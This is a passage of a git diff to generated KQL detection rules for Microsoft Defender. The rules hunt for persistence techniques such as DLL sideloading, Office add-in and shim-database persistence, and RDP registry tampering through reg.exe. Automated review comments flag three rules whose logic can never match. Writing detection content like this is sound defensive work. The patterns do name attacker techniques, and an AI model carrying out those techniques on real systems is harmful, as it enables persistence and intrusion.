 | where RegistryKey endswith "\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\TypedPaths*" and (not((InitiatingProcessFolderPath in~ ("C:\\Windows\\explorer.exe", "C:\\Windows\\SysWOW64\\explorer.exe"))))
\ No newline at end of file
diff --git a/KQL/rules/Persistence/potential_persistence_via_visual_studio_tools_for_office.kql b/KQL/rules/Persistence/potential_persistence_via_visual_studio_tools_for_office.kql
index 53e07333..a9a51619 100644
--- a/KQL/rules/Persistence/potential_persistence_via_visual_studio_tools_for_office.kql
+++ b/KQL/rules/Persistence/potential_persistence_via_visual_studio_tools_for_office.kql
@@ -1,12 +1,12 @@
-// Title: Potential Persistence Via Visual Studio Tools for Office
-// Author: Bhabesh Raj
-// Date: 2021-01-10
-// Level: medium
-// Description: Detects persistence via Visual Studio Tools for Office (VSTO) add-ins in Office applications.
-// MITRE Tactic: Persistence
-// Tags: attack.t1137.006, attack.persistence
-// False Positives:
-// - Legitimate Addin Installation
-
-DeviceRegistryEvents
+// Title: Potential Persistence Via Visual Studio Tools for Office
+// Author: Bhabesh Raj
+// Date: 2021-01-10
+// Level: medium
+// Description: Detects persistence via Visual Studio Tools for Office (VSTO) add-ins in Office applications.
+// MITRE Tactic: Persistence
+// Tags: attack.t1137.006, attack.persistence
+// False Positives:
+// - Legitimate Addin Installation
+
+DeviceRegistryEvents
 | where (RegistryKey endswith "\\Software\\Microsoft\\Office\\Outlook\\Addins*" or RegistryKey endswith "\\Software\\Microsoft\\Office\\Word\\Addins*" or RegistryKey endswith "\\Software\\Microsoft\\Office\\Excel\\Addins*" or RegistryKey endswith "\\Software\\Microsoft\\Office\\Powerpoint\\Addins*" or RegistryKey endswith "\\Software\\Microsoft\\VSTO\\Security\\Inclusion*") and (not(((InitiatingProcessFolderPath in~ ("C:\\Program Files (x86)\\Microsoft Office\\root\\integration\\integrator.exe", "C:\\Program Files\\Microsoft Office\\root\\integration\\integrator.exe")) or ((InitiatingProcessFolderPath endswith "\\excel.exe" or InitiatingProcessFolderPath endswith "\\Integrator.exe" or InitiatingProcessFolderPath endswith "\\outlook.exe" or InitiatingProcessFolderPath endswith "\\powerpnt.exe" or InitiatingProcessFolderPath endswith "\\Teams.exe" or InitiatingProcessFolderPath endswith "\\visio.exe" or InitiatingProcessFolderPath endswith "\\winword.exe") and (InitiatingProcessFolderPath startswith "C:\\Program Files\\Microsoft Office\\OFFICE" or InitiatingProcessFolderPath startswith "C:\\Program Files (x86)\\Microsoft Office\\OFFICE" or InitiatingProcessFolderPath startswith "C:\\Program Files\\Microsoft Office\\Root\\OFFICE" or InitiatingProcessFolderPath startswith "C:\\Program Files (x86)\\Microsoft Office\\Root\\OFFICE")) or (InitiatingProcessFolderPath endswith "\\OfficeClickToRun.exe" and (InitiatingProcessFolderPath startswith "C:\\Program Files\\Common Files (x86)\\Microsoft Shared\\ClickToRun\\" or InitiatingProcessFolderPath startswith "C:\\Program Files\\Common Files\\Microsoft Shared\\ClickToRun\\")) or (InitiatingProcessFolderPath in~ ("C:\\Windows\\System32\\msiexec.exe", "C:\\Windows\\SysWOW64\\msiexec.exe", "C:\\Windows\\System32\\regsvr32.exe", "C:\\Windows\\SysWOW64\\regsvr32.exe"))))) and (not((((InitiatingProcessFolderPath in~ ("C:\\Program Files\\Avast Software\\Avast\\RegSvr.exe", "C:\\Program Files (x86)\\Avast Software\\Avast\\RegSvr.exe")) and RegistryKey endswith "\\Microsoft\\Office\\Outlook\\Addins\\Avast.AsOutExt*") or ((InitiatingProcessFolderPath in~ ("C:\\Program Files\\AVG\\Antivirus\\RegSvr.exe", "C:\\Program Files (x86)\\AVG\\Antivirus\\RegSvr.exe")) and RegistryKey endswith "\\Microsoft\\Office\\Outlook\\Addins\\Antivirus.AsOutExt*"))))
\ No newline at end of file
diff --git a/KQL/rules/Persistence/potential_privilege_escalation_via_service_permissions_weakness.kql b/KQL/rules/Persistence/potential_privilege_escalation_via_service_permissions_weakness.kql
index b7e27451..577d9e0a 100644
--- a/KQL/rules/Persistence/potential_privilege_escalation_via_service_permissions_weakness.kql
+++ b/KQL/rules/Persistence/potential_privilege_escalation_via_service_permissions_weakness.kql
@@ -1,10 +1,10 @@
-// Title: Potential Privilege Escalation via Service Permissions Weakness
-// Author: Teymur Kheirkhabarov
-// Date: 2019-10-26
-// Level: high
-// Description: Detect modification of services configuration (ImagePath, FailureCommand and ServiceDLL) in registry by processes with Medium integrity level
-// MITRE Tactic: Persistence
-// Tags: attack.persistence, attack.defense-evasion, attack.privilege-escalation, attack.t1574.011
-
-DeviceProcessEvents
+// Title: Potential Privilege Escalation via Service Permissions Weakness
+// Author: Teymur Kheirkhabarov
+// Date: 2019-10-26
+// Level: high
+// Description: Detect modification of services configuration (ImagePath, FailureCommand and ServiceDLL) in registry by processes with Medium integrity level
+// MITRE Tactic: Persistence
+// Tags: attack.persistence, attack.defense-evasion, attack.privilege-escalation, attack.t1574.011
+
+DeviceProcessEvents
 | where (ProcessCommandLine contains "\\ImagePath" or ProcessCommandLine contains "\\FailureCommand" or ProcessCommandLine contains "\\ServiceDll") and (ProcessCommandLine contains "ControlSet" and ProcessCommandLine contains "services") and (ProcessIntegrityLevel in~ ("Medium", "S-1-16-8192"))
\ No newline at end of file
diff --git a/KQL/rules/Persistence/potential_qakbot_registry_activity.kql b/KQL/rules/Persistence/potential_qakbot_registry_activity.kql
index 4bffdbfa..225ea1f1 100644
--- a/KQL/rules/Persistence/potential_qakbot_registry_activity.kql
+++ b/KQL/rules/Persistence/potential_qakbot_registry_activity.kql
@@ -1,10 +1,10 @@
-// Title: Potential Qakbot Registry Activity
-// Author: Hieu Tran
-// Date: 2023-03-13
-// Level: high
-// Description: Detects a registry key used by IceID in a campaign that distributes malicious OneNote files
-// MITRE Tactic: Persistence
-// Tags: attack.persistence, attack.defense-evasion, attack.t1112
-
-DeviceRegistryEvents
+// Title: Potential Qakbot Registry Activity
+// Author: Hieu Tran
+// Date: 2023-03-13
+// Level: high
+// Description: Detects a registry key used by IceID in a campaign that distributes malicious OneNote files
+// MITRE Tactic: Persistence
+// Tags: attack.persistence, attack.defense-evasion, attack.t1112
+
+DeviceRegistryEvents
 | where RegistryKey endswith "\\Software\\firm\\soft\\Name"
\ No newline at end of file
diff --git a/KQL/rules/Persistence/potential_rcdll_dll_sideloading.kql b/KQL/rules/Persistence/potential_rcdll_dll_sideloading.kql
index 57dcb81d..a3f1ecd5 100644
--- a/KQL/rules/Persistence/potential_rcdll_dll_sideloading.kql
+++ b/KQL/rules/Persistence/potential_rcdll_dll_sideloading.kql
@@ -1,10 +1,10 @@
-// Title: Potential Rcdll.DLL Sideloading
-// Author: X__Junior (Nextron Systems)
-// Date: 2023-03-13
-// Level: high
-// Description: Detects potential DLL sideloading of rcdll.dll
-// MITRE Tactic: Persistence
-// Tags: attack.persistence, attack.defense-evasion, attack.privilege-escalation, attack.t1574.001
-
-DeviceImageLoadEvents
+// Title: Potential Rcdll.DLL Sideloading
+// Author: X__Junior (Nextron Systems)
+// Date: 2023-03-13
+// Level: high
+// Description: Detects potential DLL sideloading of rcdll.dll
+// MITRE Tactic: Persistence
+// Tags: attack.persistence, attack.defense-evasion, attack.privilege-escalation, attack.t1574.001
+
+DeviceImageLoadEvents
 | where FolderPath endswith "\\rcdll.dll" and (not((FolderPath startswith "C:\\Program Files (x86)\\Microsoft Visual Studio\\" or FolderPath startswith "C:\\Program Files (x86)\\Windows Kits\\")))
\ No newline at end of file
diff --git a/KQL/rules/Persistence/potential_rjvplatform_dll_sideloading_from_default_location.kql b/KQL/rules/Persistence/potential_rjvplatform_dll_sideloading_from_default_location.kql
index 59111e2b..96cf94db 100644
--- a/KQL/rules/Persistence/potential_rjvplatform_dll_sideloading_from_default_location.kql
+++ b/KQL/rules/Persistence/potential_rjvplatform_dll_sideloading_from_default_location.kql
@@ -1,10 +1,10 @@
-// Title: Potential RjvPlatform.DLL Sideloading From Default Location
-// Author: X__Junior (Nextron Systems)
-// Date: 2023-06-09
-// Level: medium
-// Description: Detects loading of "RjvPlatform.dll" by the "SystemResetPlatform.exe" binary which can be abused as a method of DLL side loading since the "$SysReset" directory isn't created by default.
-// MITRE Tactic: Persistence
-// Tags: attack.persistence, attack.defense-evasion, attack.privilege-escalation, attack.t1574.001
-
-DeviceImageLoadEvents
+// Title: Potential RjvPlatform.DLL Sideloading From Default Location
+// Author: X__Junior (Nextron Systems)
+// Date: 2023-06-09
+// Level: medium
+// Description: Detects loading of "RjvPlatform.dll" by the "SystemResetPlatform.exe" binary which can be abused as a method of DLL side loading since the "$SysReset" directory isn't created by default.
+// MITRE Tactic: Persistence
+// Tags: attack.persistence, attack.defense-evasion, attack.privilege-escalation, attack.t1574.001
+
+DeviceImageLoadEvents
 | where InitiatingProcessFolderPath =~ "C:\\Windows\\System32\\SystemResetPlatform\\SystemResetPlatform.exe" and FolderPath =~ "C:\\$SysReset\\Framework\\Stack\\RjvPlatform.dll"
\ No newline at end of file
diff --git a/KQL/rules/Persistence/potential_rjvplatform_dll_sideloading_from_non_default_location.kql b/KQL/rules/Persistence/potential_rjvplatform_dll_sideloading_from_non_default_location.kql
index be764d08..e8ce9673 100644
--- a/KQL/rules/Persistence/potential_rjvplatform_dll_sideloading_from_non_default_location.kql
+++ b/KQL/rules/Persistence/potential_rjvplatform_dll_sideloading_from_non_default_location.kql
@@ -1,12 +1,12 @@
-// Title: Potential RjvPlatform.DLL Sideloading From Non-Default Location
-// Author: X__Junior (Nextron Systems)
-// Date: 2023-06-09
-// Level: high
-// Description: Detects potential DLL sideloading of "RjvPlatform.dll" by "SystemResetPlatform.exe" located in a non-default location.
-// MITRE Tactic: Persistence
-// Tags: attack.persistence, attack.defense-evasion, attack.privilege-escalation, attack.t1574.001
-// False Positives:
-// - Unlikely
-
-DeviceImageLoadEvents
+// Title: Potential RjvPlatform.DLL Sideloading From Non-Default Location
+// Author: X__Junior (Nextron Systems)
+// Date: 2023-06-09
+// Level: high
+// Description: Detects potential DLL sideloading of "RjvPlatform.dll" by "SystemResetPlatform.exe" located in a non-default location.
+// MITRE Tactic: Persistence
+// Tags: attack.persistence, attack.defense-evasion, attack.privilege-escalation, attack.t1574.001
+// False Positives:
+// - Unlikely
+
+DeviceImageLoadEvents
 | where (InitiatingProcessFolderPath =~ "\\SystemResetPlatform.exe" and FolderPath endswith "\\RjvPlatform.dll") and (not(InitiatingProcessFolderPath startswith "C:\\Windows\\System32\\SystemResetPlatform\\"))
\ No newline at end of file
diff --git a/KQL/rules/Persistence/potential_roboform_dll_sideloading.kql b/KQL/rules/Persistence/potential_roboform_dll_sideloading.kql
index 88e63fc1..f0febe69 100644
--- a/KQL/rules/Persistence/potential_roboform_dll_sideloading.kql
+++ b/KQL/rules/Persistence/potential_roboform_dll_sideloading.kql
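Review bot: `InitiatingProcessFolderPath =~ "\\SystemResetPlatform.exe"` in the new `| where` line of the non-default-location RjvPlatform hunk is an exact whole-string comparison against a bare file name, but InitiatingProcessFolderPath carries the full path, so the conjunction is never true and the rule is dead. The term should mirror the `FolderPath endswith "\\RjvPlatform.dll"` next to it: `InitiatingProcessFolderPath endswith "\\SystemResetPlatform.exe"`. Because the file is generated, this presumably reflects how the backend maps a leading-backslash pattern without a trailing wildcard to `=~`; the default-location rule above is unaffected only because its patterns are complete paths.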
@@ -1,12 +1,12 @@
-// Title: Potential RoboForm.DLL Sideloading
-// Author: X__Junior (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)
-// Date: 2023-05-14
-// Level: medium
-// Description: Detects potential DLL sideloading of "roboform.dll", a DLL used by RoboForm Password Manager
-// MITRE Tactic: Persistence
-// Tags: attack.persistence, attack.defense-evasion, attack.privilege-escalation, attack.t1574.001
-// False Positives:
-// - If installed on a per-user level, the path would be located in "AppData\Local". Add additional filters to reflect this mode of installation
-
-DeviceImageLoadEvents
+// Title: Potential RoboForm.DLL Sideloading
+// Author: X__Junior (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)
+// Date: 2023-05-14
+// Level: medium
+// Description: Detects potential DLL sideloading of "roboform.dll", a DLL used by RoboForm Password Manager
+// MITRE Tactic: Persistence
+// Tags: attack.persistence, attack.defense-evasion, attack.privilege-escalation, attack.t1574.001
+// False Positives:
+// - If installed on a per-user level, the path would be located in "AppData\Local". Add additional filters to reflect this mode of installation
+
+DeviceImageLoadEvents
 | where (FolderPath endswith "\\roboform.dll" or FolderPath endswith "\\roboform-x64.dll") and (not(((InitiatingProcessFolderPath endswith "\\robotaskbaricon.exe" or InitiatingProcessFolderPath endswith "\\robotaskbaricon-x64.exe") and (InitiatingProcessFolderPath startswith " C:\\Program Files (x86)\\Siber Systems\\AI RoboForm\\" or InitiatingProcessFolderPath startswith " C:\\Program Files\\Siber Systems\\AI RoboForm\\"))))
\ No newline at end of file
diff --git a/KQL/rules/Persistence/potential_sentinelone_shell_context_menu_scan_command_tampering.kql b/KQL/rules/Persistence/potential_sentinelone_shell_context_menu_scan_command_tampering.kql
index 647717f9..9a5cd754 100644
--- a/KQL/rules/Persistence/potential_sentinelone_shell_context_menu_scan_command_tampering.kql
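Review bot: Both allow-list prefixes in the new `| where` line of the RoboForm hunk begin with a space inside the string literal, `startswith " C:\\Program Files (x86)\\Siber Systems\\AI RoboForm\\"`, which no real path starts with, so the `not(...)` exclusion never applies and every load of roboform.dll by robotaskbaricon.exe from the vendor directory is reported as a potential sideload. Dropping the leading space in both terms, `startswith "C:\\Program Files (x86)\\Siber Systems\\AI RoboForm\\"` and `startswith "C:\\Program Files\\Siber Systems\\AI RoboForm\\"`, restores the intended exclusion. The stray space is present in the removed lines too, so it may originate in the upstream rule rather than in the converter and is worth checking there before regenerating.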
+++ b/KQL/rules/Persistence/potential_sentinelone_shell_context_menu_scan_command_tampering.kql
@@ -1,10 +1,10 @@
-// Title: Potential SentinelOne Shell Context Menu Scan Command Tampering
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2024-03-06
-// Level: medium
-// Description: Detects potentially suspicious changes to the SentinelOne context menu scan command by a process other than SentinelOne.
-// MITRE Tactic: Persistence
-// Tags: attack.persistence
-
-DeviceRegistryEvents
+// Title: Potential SentinelOne Shell Context Menu Scan Command Tampering
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2024-03-06
+// Level: medium
+// Description: Detects potentially suspicious changes to the SentinelOne context menu scan command by a process other than SentinelOne.
+// MITRE Tactic: Persistence
+// Tags: attack.persistence
+
+DeviceRegistryEvents
 | where RegistryKey endswith "\\shell\\SentinelOneScan\\command*" and (not(((InitiatingProcessFolderPath endswith "C:\\Program Files\\SentinelOne\\" or InitiatingProcessFolderPath endswith "C:\\Program Files (x86)\\SentinelOne\\") or (RegistryValueData contains "\\SentinelScanFromContextMenu.exe" and (RegistryValueData startswith "C:\\Program Files\\SentinelOne\\Sentinel Agent" or RegistryValueData startswith "C:\\Program Files (x86)\\SentinelOne\\Sentinel Agent")))))
\ No newline at end of file
diff --git a/KQL/rules/Persistence/potential_shelldispatch_dll_sideloading.kql b/KQL/rules/Persistence/potential_shelldispatch_dll_sideloading.kql
index 7211edc2..ec25ca4a 100644
--- a/KQL/rules/Persistence/potential_shelldispatch_dll_sideloading.kql
+++ b/KQL/rules/Persistence/potential_shelldispatch_dll_sideloading.kql
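Review bot: The first exclusion branch in the new `| where` line of the SentinelOne hunk, `InitiatingProcessFolderPath endswith "C:\\Program Files\\SentinelOne\\"`, asks whether a process path ends with a directory prefix, which it never does because the column ends in the executable name; that branch is therefore dead and the vendor's own processes are only excluded when the RegistryValueData branch happens to match. The operator should be `startswith`, i.e. `InitiatingProcessFolderPath startswith "C:\\Program Files\\SentinelOne\\"` and `InitiatingProcessFolderPath startswith "C:\\Program Files (x86)\\SentinelOne\\"`. As the file is generated, this is presumably a backend mapping of a Sigma path prefix that is worth fixing at the source.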
@@ -1,12 +1,12 @@
-// Title: Potential ShellDispatch.DLL Sideloading
-// Author: X__Junior (Nextron Systems)
-// Date: 2023-06-20
-// Level: medium
-// Description: Detects potential DLL sideloading of "ShellDispatch.dll"
-// MITRE Tactic: Persistence
-// Tags: attack.persistence, attack.defense-evasion, attack.privilege-escalation, attack.t1574.001
-// False Positives:
-// - Some installers may trigger some false positives
-
-DeviceImageLoadEvents
+// Title: Potential ShellDispatch.DLL Sideloading
+// Author: X__Junior (Nextron Systems)
+// Date: 2023-06-20
+// Level: medium
+// Description: Detects potential DLL sideloading of "ShellDispatch.dll"
+// MITRE Tactic: Persistence
+// Tags: attack.persistence, attack.defense-evasion, attack.privilege-escalation, attack.t1574.001
+// False Positives:
+// - Some installers may trigger some false positives
+
+DeviceImageLoadEvents
 | where FolderPath endswith "\\ShellDispatch.dll" and (not(((FolderPath contains ":\\Users\\" and FolderPath contains "\\AppData\\Local\\Temp\\") or FolderPath contains ":\\Windows\\Temp\\")))
\ No newline at end of file
diff --git a/KQL/rules/Persistence/potential_shim_database_persistence_via_sdbinst_exe.kql b/KQL/rules/Persistence/potential_shim_database_persistence_via_sdbinst_exe.kql
index 5fe0eea1..fbb6dafc 100644
--- a/KQL/rules/Persistence/potential_shim_database_persistence_via_sdbinst_exe.kql
+++ b/KQL/rules/Persistence/potential_shim_database_persistence_via_sdbinst_exe.kql
@@ -1,11 +1,11 @@
-// Title: Potential Shim Database Persistence via Sdbinst.EXE
-// Author: Markus Neis
-// Date: 2019-01-16
-// Level: medium
-// Description: Detects installation of a new shim using sdbinst.exe.
-// Adversaries may establish persistence and/or elevate privileges by executing malicious content triggered by application shims
-// MITRE Tactic: Persistence
-// Tags: attack.persistence, attack.privilege-escalation, attack.t1546.011
-
-DeviceProcessEvents
+// Title: Potential Shim Database Persistence via Sdbinst.EXE
+// Author: Markus Neis
+// Date: 2019-01-16
+// Level: medium
+// Description: Detects installation of a new shim using sdbinst.exe.
+// Adversaries may establish persistence and/or elevate privileges by executing malicious content triggered by application shims
+// MITRE Tactic: Persistence
+// Tags: attack.persistence, attack.privilege-escalation, attack.t1546.011
+
+DeviceProcessEvents
 | where (ProcessCommandLine contains ".sdb" and (FolderPath endswith "\\sdbinst.exe" or ProcessVersionInfoOriginalFileName =~ "sdbinst.exe")) and (not(((ProcessCommandLine contains ":\\Program Files (x86)\\IIS Express\\iisexpressshim.sdb" or ProcessCommandLine contains ":\\Program Files\\IIS Express\\iisexpressshim.sdb") and InitiatingProcessFolderPath endswith "\\msiexec.exe")))
\ No newline at end of file
diff --git a/KQL/rules/Persistence/potential_smadhook_dll_sideloading.kql b/KQL/rules/Persistence/potential_smadhook_dll_sideloading.kql
index ce441f53..6272a136 100644
--- a/KQL/rules/Persistence/potential_smadhook_dll_sideloading.kql
+++ b/KQL/rules/Persistence/potential_smadhook_dll_sideloading.kql
@@ -1,12 +1,12 @@
-// Title: Potential SmadHook.DLL Sideloading
-// Author: X__Junior (Nextron Systems)
-// Date: 2023-06-01
-// Level: high
-// Description: Detects potential DLL sideloading of "SmadHook.dll", a DLL used by SmadAV antivirus
-// MITRE Tactic: Persistence
-// Tags: attack.persistence, attack.defense-evasion, attack.privilege-escalation, attack.t1574.001
-// False Positives:
-// - Unlikely
-
-DeviceImageLoadEvents
+// Title: Potential SmadHook.DLL Sideloading
+// Author: X__Junior (Nextron Systems)
+// Date: 2023-06-01
+// Level: high
+// Description: Detects potential DLL sideloading of "SmadHook.dll", a DLL used by SmadAV antivirus
+// MITRE Tactic: Persistence
+// Tags: attack.persistence, attack.defense-evasion, attack.privilege-escalation, attack.t1574.001
+// False Positives:
+// - Unlikely
+
+DeviceImageLoadEvents
 | where (FolderPath endswith "\\SmadHook32c.dll" or FolderPath endswith "\\SmadHook64c.dll") and (not(((InitiatingProcessFolderPath in~ ("C:\\Program Files (x86)\\SMADAV\\SmadavProtect32.exe", "C:\\Program Files (x86)\\SMADAV\\SmadavProtect64.exe", "C:\\Program Files\\SMADAV\\SmadavProtect32.exe", "C:\\Program Files\\SMADAV\\SmadavProtect64.exe")) and (FolderPath startswith "C:\\Program Files (x86)\\SMADAV\\" or FolderPath startswith "C:\\Program Files\\SMADAV\\"))))
\ No newline at end of file
diff --git a/KQL/rules/Persistence/potential_solidpdfcreator_dll_sideloading.kql b/KQL/rules/Persistence/potential_solidpdfcreator_dll_sideloading.kql
index b60ddd2d..5897c31d 100644
--- a/KQL/rules/Persistence/potential_solidpdfcreator_dll_sideloading.kql
+++ b/KQL/rules/Persistence/potential_solidpdfcreator_dll_sideloading.kql
@@ -1,10 +1,10 @@
-// Title: Potential SolidPDFCreator.DLL Sideloading
-// Author: X__Junior (Nextron Systems)
-// Date: 2023-05-07
-// Level: medium
-// Description: Detects potential DLL sideloading of "SolidPDFCreator.dll"
-// MITRE Tactic: Persistence
-// Tags: attack.persistence, attack.defense-evasion, attack.privilege-escalation, attack.t1574.001
-
-DeviceImageLoadEvents
+// Title: Potential SolidPDFCreator.DLL Sideloading
+// Author: X__Junior (Nextron Systems)
+// Date: 2023-05-07
+// Level: medium
+// Description: Detects potential DLL sideloading of "SolidPDFCreator.dll"
+// MITRE Tactic: Persistence
+// Tags: attack.persistence, attack.defense-evasion, attack.privilege-escalation, attack.t1574.001
+
+DeviceImageLoadEvents
 | where FolderPath endswith "\\SolidPDFCreator.dll" and (not(((FolderPath startswith "C:\\Program Files (x86)\\SolidDocuments\\SolidPDFCreator\\" or FolderPath startswith "C:\\Program Files\\SolidDocuments\\SolidPDFCreator\\") and InitiatingProcessFolderPath endswith "\\SolidPDFCreator.exe")))
\ No newline at end of file
diff --git a/KQL/rules/Persistence/potential_suspicious_powershell_module_file_created.kql b/KQL/rules/Persistence/potential_suspicious_powershell_module_file_created.kql
index ce854186..46850117 100644
--- a/KQL/rules/Persistence/potential_suspicious_powershell_module_file_created.kql
+++ b/KQL/rules/Persistence/potential_suspicious_powershell_module_file_created.kql
@@ -1,12 +1,12 @@
-// Title: Potential Suspicious PowerShell Module File Created
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2023-05-09
-// Level: medium
-// Description: Detects the creation of a new PowerShell module in the first folder of the module directory structure "\WindowsPowerShell\Modules\malware\malware.psm1". This is somewhat an uncommon practice as legitimate modules often includes a version folder.
-// MITRE Tactic: Persistence
-// Tags: attack.persistence
-// False Positives:
-// - False positive rate will vary depending on the environments. Additional filters might be required to make this logic usable in production.
-
-DeviceFileEvents
+// Title: Potential Suspicious PowerShell Module File Created
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2023-05-09
+// Level: medium
+// Description: Detects the creation of a new PowerShell module in the first folder of the module directory structure "\WindowsPowerShell\Modules\malware\malware.psm1". This is somewhat an uncommon practice as legitimate modules often includes a version folder.
+// MITRE Tactic: Persistence
+// Tags: attack.persistence
+// False Positives:
+// - False positive rate will vary depending on the environments. Additional filters might be required to make this logic usable in production.
+
+DeviceFileEvents
 | where (FolderPath contains "\\WindowsPowerShell\\Modules\\" and FolderPath contains "\\.ps") or (FolderPath contains "\\WindowsPowerShell\\Modules\\" and FolderPath contains "\\.dll")
\ No newline at end of file
diff --git a/KQL/rules/Persistence/potential_suspicious_registry_file_imported_via_reg_exe.kql b/KQL/rules/Persistence/potential_suspicious_registry_file_imported_via_reg_exe.kql
index 34910143..eac0d05c 100644
--- a/KQL/rules/Persistence/potential_suspicious_registry_file_imported_via_reg_exe.kql
+++ b/KQL/rules/Persistence/potential_suspicious_registry_file_imported_via_reg_exe.kql
@@ -1,12 +1,12 @@
-// Title: Potential Suspicious Registry File Imported Via Reg.EXE
-// Author: frack113, Nasreddine Bencherchali
-// Date: 2022-08-01
-// Level: medium
-// Description: Detects the import of '.reg' files from suspicious paths using the 'reg.exe' utility
-// MITRE Tactic: Persistence
-// Tags: attack.persistence, attack.t1112, attack.defense-evasion
-// False Positives:
-// - Legitimate import of keys
-
-DeviceProcessEvents
+// Title: Potential Suspicious Registry File Imported Via Reg.EXE
+// Author: frack113, Nasreddine Bencherchali
+// Date: 2022-08-01
+// Level: medium
+// Description: Detects the import of '.reg' files from suspicious paths using the 'reg.exe' utility
+// MITRE Tactic: Persistence
+// Tags: attack.persistence, attack.t1112, attack.defense-evasion
+// False Positives:
+// - Legitimate import of keys
+
+DeviceProcessEvents
 | where ProcessCommandLine contains " import " and (FolderPath endswith "\\reg.exe" or ProcessVersionInfoOriginalFileName =~ "reg.exe") and (ProcessCommandLine contains "C:\\Users\\" or ProcessCommandLine contains "%temp%" or ProcessCommandLine contains "%tmp%" or ProcessCommandLine contains "%appdata%" or ProcessCommandLine contains "\\AppData\\Local\\Temp\\" or ProcessCommandLine contains "C:\\Windows\\Temp\\" or ProcessCommandLine contains "C:\\ProgramData\\")
\ No newline at end of file
diff --git a/KQL/rules/Persistence/potential_tampering_with_rdp_related_registry_keys_via_reg_exe.kql b/KQL/rules/Persistence/potential_tampering_with_rdp_related_registry_keys_via_reg_exe.kql
index 4c732da6..e5791364 100644
--- a/KQL/rules/Persistence/potential_tampering_with_rdp_related_registry_keys_via_reg_exe.kql
+++ b/KQL/rules/Persistence/potential_tampering_with_rdp_related_registry_keys_via_reg_exe.kql
@@ -1,10 +1,10 @@
-// Title: Potential Tampering With RDP Related Registry Keys Via Reg.EXE
-// Author: pH-T (Nextron Systems), @Kostastsale, TheDFIRReport
-// Date: 2022-02-12
-// Level: high
-// Description: Detects the execution of "reg.exe" for enabling/disabling the RDP service on the host by tampering with the 'CurrentControlSet\Control\Terminal Server' values
-// MITRE Tactic: Persistence
-// Tags: attack.persistence, attack.defense-evasion, attack.lateral-movement, attack.t1021.001, attack.t1112
-
-DeviceProcessEvents
+// Title: Potential Tampering With RDP Related Registry Keys Via Reg.EXE
+// Author: pH-T (Nextron Systems), @Kostastsale, TheDFIRReport
+// Date: 2022-02-12
+// Level: high
+// Description: Detects the execution of "reg.exe" for enabling/disabling the RDP service on the host by tampering with the 'CurrentControlSet\Control\Terminal Server' values
+// MITRE Tactic: Persistence
+// Tags: attack.persistence, attack.defense-evasion, attack.lateral-movement, attack.t1021.001, attack.t1112
+
+DeviceProcessEvents
 | where ((ProcessCommandLine contains " add " and ProcessCommandLine contains "\\CurrentControlSet\\Control\\Terminal Server" and ProcessCommandLine contains "REG_DWORD" and ProcessCommandLine contains " /f") and (FolderPath endswith "\\reg.exe" or ProcessVersionInfoOriginalFileName =~ "reg.exe")) and ((ProcessCommandLine contains "Licensing Core" and ProcessCommandLine contains "EnableConcurrentSessions") or (ProcessCommandLine contains "WinStations\\RDP-Tcp" or ProcessCommandLine contains "MaxInstanceCount" or ProcessCommandLine contains "fEnableWinStation" or ProcessCommandLine contains "TSUserEnabled" or ProcessCommandLine contains "TSEnabled" or ProcessCommandLine contains "TSAppCompat" or ProcessCommandLine contains "IdleWinStationPoolCount" or ProcessCommandLine contains "TSAdvertise" or ProcessCommandLine contains "AllowTSConnections" or ProcessCommandLine contains "fSingleSessionPerUser" or ProcessCommandLine contains 
"fDenyTSConnections"))
\ No newline at end of file
diff --git a/KQL/rules/Persistence/potential_vivaldi_elf_dll_sideloading.kql b/KQL/rules/Persistence/potential_vivaldi_elf_dll_sideloading.kql
index 724c5d35..88457514 100644
--- a/KQL/rules/Persistence/potential_vivaldi_elf_dll_sideloading.kql
+++ b/KQL/rules/Persistence/potential_vivaldi_elf_dll_sideloading.kql
@@ -1,10 +1,10 @@
-// Title: Potential Vivaldi_elf.DLL Sideloading
-// Author: X__Junior (Nextron Systems)
-// Date: 2023-08-03
-// Level: medium
-// Description: Detects potential DLL sideloading of "vivaldi_elf.dll"
-// MITRE Tactic: Persistence
-// Tags: attack.persistence, attack.defense-evasion, attack.privilege-escalation, attack.t1574.001
-
-DeviceImageLoadEvents
+// Title: Potential Vivaldi_elf.DLL Sideloading
+// Author: X__Junior (Nextron Systems)
+// Date: 2023-08-03
+// Level: medium
+// Description: Detects potential DLL sideloading of "vivaldi_elf.dll"
+// MITRE Tactic: Persistence
+// Tags: attack.persistence, attack.defense-evasion, attack.privilege-escalation, attack.t1574.001
+
+DeviceImageLoadEvents
 | where FolderPath endswith "\\vivaldi_elf.dll" and (not((FolderPath contains "\\Vivaldi\\Application\\" and InitiatingProcessFolderPath endswith "\\Vivaldi\\Application\\vivaldi.exe")))
\ No newline at end of file
diff --git a/KQL/rules/Persistence/potential_waveedit_dll_sideloading.kql b/KQL/rules/Persistence/potential_waveedit_dll_sideloading.kql
index 4c5051ad..5b2c2e23 100644
--- a/KQL/rules/Persistence/potential_waveedit_dll_sideloading.kql
+++ b/KQL/rules/Persistence/potential_waveedit_dll_sideloading.kql
@@ -1,12 +1,12 @@
-// Title: Potential Waveedit.DLL Sideloading
-// Author: X__Junior (Nextron Systems)
-// Date: 2023-06-14
-// Level: high
-// Description: Detects potential DLL sideloading of "waveedit.dll", which is part of the Nero WaveEditor audio editing software.
-// MITRE Tactic: Persistence
-// Tags: attack.persistence, attack.defense-evasion, attack.privilege-escalation, attack.t1574.001
-// False Positives:
-// - Unlikely
-
-DeviceImageLoadEvents
+// Title: Potential Waveedit.DLL Sideloading
+// Author: X__Junior (Nextron Systems)
+// Date: 2023-06-14
+// Level: high
+// Description: Detects potential DLL sideloading of "waveedit.dll", which is part of the Nero WaveEditor audio editing software.
+// MITRE Tactic: Persistence
+// Tags: attack.persistence, attack.defense-evasion, attack.privilege-escalation, attack.t1574.001
+// False Positives:
+// - Unlikely
+
+DeviceImageLoadEvents
